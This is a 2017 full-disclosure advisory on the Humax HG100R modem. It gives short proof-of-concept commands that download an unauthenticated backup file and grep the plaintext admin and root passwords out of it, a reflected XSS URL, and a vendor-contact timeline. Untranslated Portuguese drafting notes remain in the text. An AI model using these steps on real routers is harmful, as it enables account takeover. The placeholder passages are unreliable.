[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Humax Digital HG100R multiple vulnerabilities
From: The Gambler <gambler () tutanota ! com>
Date: 2017-06-29 21:11:56
Message-ID: KnpgY6y--3-0 () tutanota ! com
[Download RAW message or body]
Humax Digital HG100R multiple vulnerabilities
Device: Humax HG100R
Software Version: VER 2.0.6
- Backup file download (CVE-2017-7315)
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly used by ISPs to \
provide ADSL internet service to household and small business users. (CHECA ESSA INFO) To \
download the backup file it's not required the use of credentials or any authentication, and \
the router credentials are stored in plaintext inside the backup.
PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 admin
--------------------------------------------------------------------------------
- XSS Reflected(CVE-2017-7316)
An issue was discovered on Humax Digital HG100R 2.0.6 devices. DESCREVE BREVEMENTE O QUE É XSS \
REFLECTED E FALA O QUE PODE FAZER COM O USUÁRIO USANDO ISSO. There is XSS reflected on the 404 \
page.
PoC
http://192.168.0.1<script>alert('XSS')</script>
--------------------------------------------------------------------------------
- Default credentials to router's web application not declared in the manual(CVE-2017-7317) \
NÃO ENTENDI ESSA FRASE. QUE QUIS DIZER? An issue was discovered on Humax Digital HG100 2.0.6 \
devices. The attacker can find the root credentials in the backup file.
PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 root
Timeline
2017-03-15 - First contact. Ignored by the vendor.
2017-03-21 - Second contact.
2017-03-22 - The vendor answered asking about the vulnerability.
2017-03-27 - Asked the vendor about his security team contact informarion to report the \
vulnerability. 2017-03-28 - The vendor answered saying that it is an old product, and they will \
check this vulnerabilities in the news products. 2017-03-28 - Ask the vendor about a patch.
2017-03-30 - Ask the vendor again about the patch.
2017-04-03 - Notified the vendor about the disclousure after 90 days, even without a patch.
2017-04-19 - Ask the vendor about a patch.
2017-05-08 - Ask the vendor about a patch.
2017-06-29 - Disclosure.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic